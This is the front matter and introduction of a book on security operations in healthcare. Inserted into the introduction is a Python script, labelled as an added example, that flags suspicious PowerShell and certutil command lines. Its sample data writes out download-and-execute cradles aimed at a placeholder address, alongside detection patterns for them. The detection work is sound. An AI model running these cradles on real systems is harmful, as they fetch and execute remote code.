Eric C. Thompson
Dekalb, IL, USA
Any source code or other supplementary material referenced by the author in this book is available to readers on GitHub via the book's product page, located at www.apress.com/9781484256077. For more detailed information, please visit http://www.apress.com/source-code .
ISBN 978-1-4842-5607-7 e-ISBN 978-1-4842-5608-4
https://doi.org/10.1007/978-1-4842-5608-4
© Eric C. Thompson 2020
This work is subject to copyright. All rights are reserved by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed.
Trademarked names, logos, and images may appear in this book. Rather than use a trademark symbol with every occurrence of a trademarked name, logo, or image we use the names, logos, and images only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark. The use in this publication of trade names, trademarks, service marks, and similar terms, even if they are not identified as such, is not to be taken as an expression of opinion as to whether or not they are subject to proprietary rights.
While the advice and information in this book are believed to be true and accurate at the date of publication, neither the authors nor the editors nor the publisher can accept any legal responsibility for any errors or omissions that may be made. The publisher makes no warranty, express or implied, with respect to the material contained herein.
Distributed to the book trade worldwide by Springer Science+Business Media New York, 233 Spring Street, 6th Floor, New York, NY 10013. Phone 1-800-SPRINGER, fax (201) 348-4505, e-mail orders-ny@springer-sbm.com, or visit www.springeronline.com. Apress Media, LLC is a California LLC and the sole member (owner) is Springer Science + Business Media Finance Inc (SSBM Finance Inc). SSBM Finance Inc is a Delaware corporation.
Introduction
Since the advent of the "Wall of Shame", the breach portal hosted by the Department of Health and Human Services Office for Civil Rights, healthcare has been under constant attack. In the first few years, stolen medical records dominated the reported incidents. Then, around 2015, ransomware attacks began. Millions of medical records are affected annually by ransomware, theft, and unauthorized disclosure caused by misconfigurations.
Several tools and frameworks are available to healthcare entities building and evaluating information security programs. The Cybersecurity Framework developed by the National Institute of Standards and Technology (NIST) and the Health Information Trust Alliance (HITRUST) framework are two examples. Each covers information security from top to bottom: policy and procedure development, asset management, monitoring of the environment, and more. These are great places to start. They address many prerequisite capabilities, each necessary for a program to reach a high level of maturity. But more is needed to address the ongoing attacks: a deeper focus, a mindset if you will, on security operations. That is what this book is about, adopting a mindset focused on security operations. After a short discussion of why security operations is important and of the compliance requirements within HIPAA, the book addresses each component of security operations: the need for vulnerability management to go beyond scanning and patching, why threat intelligence is important, how intelligence gathering leads to better alerting and monitoring processes, and how to respond to events effectively. This book is about how to implement security, not how to check a box. If an entity does not monitor command-line execution, and attackers targeting healthcare use PowerShell at the command line to download tools and escalate privileges, the entity needs to start monitoring for PowerShell and other command-line executions. And when such events occur, the entity needs to respond swiftly.
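The PowerShell case above, as an added example that is not part of the book: a small Python triage routine run over constructed process-creation records in the style of Sysmon Event ID 1 or Windows Event ID 4688. The hosts, users, and command lines are invented, and 203.0.113.5 is a documentation address, not a real server. The routine flags PowerShell invocations that download and execute code, decodes -EncodedCommand arguments so the same indicators can be checked inside the payload, catches a few non-PowerShell download utilities, and leaves an ordinary scheduled script run unflagged.

```python
import base64
import re

# Added example, not from the book. Every record below is constructed.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def encode_ps(script):
    """Build a -EncodedCommand argument the way PowerShell expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [
    {"host": "ws01", "user": "jdoe", "image": PS_EXE,
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')\""},
    {"host": "ws02", "user": "SYSTEM", "image": PS_EXE,
     "cmdline": "powershell.exe -NoProfile -EncodedCommand "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/b.ps1')")},
    {"host": "srv01", "user": "svc_backup", "image": PS_EXE,
     "cmdline": r"powershell.exe -File C:\Scripts\nightly_backup.ps1"},
    {"host": "ws03", "user": "nurse7", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/t.exe C:\Users\Public\t.exe"},
    {"host": "ws04", "user": "admin", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir C:\Users"},
    {"host": "ws05", "user": "jdoe", "image": PS_EXE,
     "cmdline": r"powershell.exe -nop -w hidden -File C:\Temp\x.ps1"},
]

# Indicators checked on PowerShell command lines (and on the decoded payload, if any).
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    "encoded_command": re.compile(r"\s-e(?:nc|ncodedcommand|c)?\s", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
}
# Captures the base64 blob that follows -e / -ec / -enc / -EncodedCommand.
ENCODED_ARG = re.compile(r"\s-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]+)", re.I)
# A few non-PowerShell binaries commonly abused to fetch a payload.
LOLBIN_DOWNLOAD = re.compile(
    r"certutil(?:\.exe)?\s.*-urlcache|bitsadmin(?:\.exe)?\s.*/transfer"
    r"|mshta(?:\.exe)?\s+https?://|regsvr32(?:\.exe)?\s.*/i:https?://", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Score one process-creation record; severity 'none' means nothing to alert on."""
    image = event["image"].lower()
    cmdline = event["cmdline"]
    reasons, decoded = [], None
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_encoded_command(cmdline)
        # Scan the decoded payload as well, so an encoded cradle does not slip past the checks.
        scan_text = cmdline if decoded is None else cmdline + " " + decoded
        reasons = [name for name, rx in INDICATORS.items() if rx.search(scan_text)]
    if LOLBIN_DOWNLOAD.search(cmdline):
        reasons.append("lolbin_download")
    # Fetching or executing downloaded code is high on its own; a lone -NoProfile or a
    # plain -File run is routine administration and stays below the alerting threshold.
    if any(r in reasons for r in ("download_cradle", "invoke_expression", "lolbin_download")):
        severity = "high"
    elif len(reasons) >= 2:
        severity = "medium"
    elif reasons:
        severity = "low"
    else:
        severity = "none"
    return {"host": event["host"], "user": event["user"], "severity": severity,
            "reasons": reasons, "decoded": decoded}


def triage(events):
    """Return only the records worth a responder's attention, highest severity first."""
    rank = {"high": 0, "medium": 1, "low": 2}
    hits = [r for r in map(analyze_event, events) if r["severity"] != "none"]
    return sorted(hits, key=lambda r: rank[r["severity"]])


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['severity']:6} {hit['host']:5} {hit['user']:10} {', '.join(hit['reasons'])}")
        if hit["decoded"]:
            print(f"       decoded: {hit['decoded']}")
```

Against the six sample records the routine raises ws01, ws02 and ws03 as high (two PowerShell download cradles, one of them hidden behind -EncodedCommand, and a certutil fetch), ws05 as medium (hidden window plus -nop, but no download), and stays quiet on the backup script and the cmd.exe directory listing. In production the same logic would read command lines from an EDR or SIEM feed rather than a list, and the indicator table would grow with what intelligence says attackers are using against the entity.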
Large budgets are not necessary to implement the processes security operations requires. Open source solutions are available, and team members can learn to customize each for the environment where it is deployed. Security operations does not require large teams either. Information security teams of fewer than five members are not unheard of, especially at small- to medium-sized providers, payers, and business associates. Again, it is about adopting the mindset of wanting to understand how sophisticated attackers and malicious insiders target entities, and implementing information security that quickly detects that activity. This book was a lot of fun to write, and I hope you enjoy it and learn something you can take to work.
Acknowledgments
Thanks to Susan McDermott. Over ten years ago, I went back to graduate school to make a career change, hoping to one day publish books in my field. Thanks to Susan, I have published three and the experience was amazing. Thanks to Rita Fernando for shepherding me through the process once again. Writing a book is challenging and it's not unusual for self-doubt to appear during the process. Rita's positive attitude and direction play a significant role each time I complete one of these projects. I would also like to thank my technical editors Alfonso Gallegos and Julie Yang. These two are wonderful to work with and I am grateful for the experience.
Finally, I need to thank my family: my wife Daina, our daughter Hannah, and our two sons Daniel and Hunter. I beam with pride just thinking about you all.